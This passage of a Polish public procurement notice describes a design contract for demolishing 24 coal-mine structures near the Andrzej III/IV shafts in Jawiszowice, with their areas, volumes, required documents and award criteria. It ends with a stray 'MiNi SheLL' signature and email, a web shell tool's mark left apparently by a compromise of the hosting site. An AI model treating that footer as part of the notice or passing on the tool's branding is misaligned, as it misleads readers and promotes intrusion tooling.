kosztorysy inwestorskie (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Z - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV
Projekt budowlano - wykonawczy likwidacji 24 obiektów budowlanych wraz 
z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek kompresorów i wentylatorów z chłodnią wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami, pow. zabudowy 750,0 m2, kubatura 10 000,0 m3, budynek wentylatorów murowany wyposażony w dwa wentylatory z dyfuzorami, chłodnia o podstawie prostokąta, pow. zabudowy                   250,0 m2, kubatura 300,0 m3.
Budynek stacji sprężarek głównych przy szybach AIII/IV z wyłączeniem budynku rozdzielni J-0-3 wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami, pow. zabudowy 450,0 m2, kubatura 5 000,0 m3, konstrukcja budynku żelbetowo-murowana, dach z płyt żelbetowych na dźwigarach stalowych.
Rurociąg sprężonego powietrza prowadzony kanałem w rejonie szybów Andrzej III/IV (ze stacji sprężarek do szybu Andrzej III), rurociąg stalowy o średnicy mm i długości 365 m prowadzony w ziemi w kanale betonowym.
Budynki Kopalnianej Stacji Ratownictwa Górniczego wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami, Stację Ratowniczą stanowią trzy obiekty: 
Budynek administracyjno-gospodarczy pow. zabudowy 150,0 m2, kubatura 800,0 m3, 
Budynek szkoleniowy pow. zabudowy 350,0 m2, kubatura 2 000,0 m3, 
Budynek magazynowy pow. zabudowy 40,0 m2, kubatura 120,0 m3.
Budynek stacji elektroenergetycznej J-0-1 i GST 110/6kV Jawiszowice wraz z urządzeniami 
i sieciami rozdzielczymi. Budynek rozdzielni pow. zabudowy 500,0 m2, kubatura                                 6 000,0 m3, Urządzenia napowietrznej stacji transformatorowej GST 110 kV Jawiszowice pow. zabudowy 1 350,0 m2.
Budynek kołowrotu przy szybie AIII Jawiszowice, wraz z wyposażeniem oraz likwidacją przyłączy i  urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 70,0 m2, kubatura 400,0 m3. 
Budynek Stacji Transformatorowej J-0-3 A IV Jawiszowice wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń  przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 150,0 m2, kubatura 1 500,0 m3. 
Basen OW chłodzenia wody, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń  przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 500,0 m2, kubatura  1 500,0 m3. 
Budynek przygotowania podsadzki, wraz z wyposażeniem oraz likwidacją przyłączy                      i urządzeń  przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 300 m2, kubatura 1 450,0 m3. 
Budynek drobnej sprzedaży węgla AIII/IV z mostami, stacjami przesypowymi i stacją załadowczą, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami, pow. zabudowy 800,0 m2, kubatura 4 250,0 m3. 
Plac składowy miału przy szybie AIII, wraz z wyposażeniem oraz likwidacją przyłączy                       i urządzeń  przesyłowych integralnie związanych z tym obiektem, pow. zabudowy                     20 600,0 m2.
Budynek wagi z wagą wozową Jawiszowice, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 150,0 m2, kubatura 450,0 m3. 
Budynek zajezdni lokomotyw spalinowych AIII/AIV, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 550,0 m2, kubatura 3 500,0 m3, 
Budynek nastawni wykonawczej Jawiszowice przy AIII/IV, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 40,0 m2, kubatura 400,0 m3, 
Budynek nastawni, dyspozytornia Jawiszowice przy AIII/IV, wraz z wyposażeniem oraz likwidacją  przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 40,0 m2, kubatura 400,0 m3. 
Budynek kołowrotu przy budynku maszyny wyciągowej AIV Jawiszowice, wraz                          z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 80,0 m2, kubatura 400,0 m3.
Magazyn paliw i przygotowania emulgatu Jawiszowice, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 75,0 m2, kubatura 375,0 m3. 
Budynek kotłowni Jawiszowice, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń  przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 72,0 m2, kubatura 700,0 m3. 
Tor normalny do zajezdni , tor przeładunkowy plus 4 rozjazdy, łączna długość torów 530,0mb.
Tory przy szybie AIII/AIV plus 27 rozjazdów, łączna długość torów ok. 5 000,0 mb.
Ścianki oporowe o konstrukcji żelbetowej, łączna długość ok. 1 500,0 mb. 
Tor nr 201 od BS do Jawiszowic, łączna długość torów ok. 2 000,0 mb.
Budynek ekspedycji w rejonie stacji PKP Brzeszcze, wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 200,0 m2, kubatura 1 000,0 m3.
Budynek handlowo-szkoleniowy (orkiestra) Jawiszowice, wraz z wyposażeniem oraz likwidacją  przyłączy i urządzeń przesyłowych integralnie związanych z tym obiektem, pow. zabudowy 120,0 m2, kubatura 900,0 m3.

Zakres rzeczowy dokumentacji - projektu powinien obejmować:
inwentaryzację  przeznaczonych do rozbiórki obiektów,
inwentaryzację przewidzianego do odzysku złomu z likwidacji obiektów,
rozbiórkę obiektów budowlanych wraz z fundamentami,
demontaż i rozbiórkę wyposażenia obiektów budowlanych,
likwidację przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami,
inwentaryzację odpadów pochodzących z rozbiórki,
inwentaryzację materiałów z rozbiórki nadających się do zasypania szybu oraz wyliczenie nakładów na ich pozyskanie,
likwidację kanałów (np. kablowych, itp.) wokół rozbieranych obiektów,
zasypanie pustek po rozbiórce fundamentów materiałami,
uzyskanie pozwolenia na rozbiórkę w/w obiektów wraz z uzgodnieniami, w tym                           z konserwatorem zabytków,
roboty porządkowe.

Dokumentacja techniczna powinna zawierać:
niezbędne obliczenia,
inwentaryzację obiektów przeznaczonych do rozbiórki (dla każdego obiektu osobno)                     - 2 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej,
część opisową (sposób wykonania rozbiórki) i rysunkową (dla każdego obiektu osobno)                      - 4 egzemplarze. w wersji papierowej, 2 egzemplarze w wersji elektronicznej,
przedmiary robót (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej                                   i 2 egzemplarze w wersji elektronicznej,
kosztorysy inwestorskie (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej, 2 egzemplarzew wersji elektronicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 180.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Zatrudnienie na podstawie umowy o pracę osób wykonujących czynności w trakcie realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com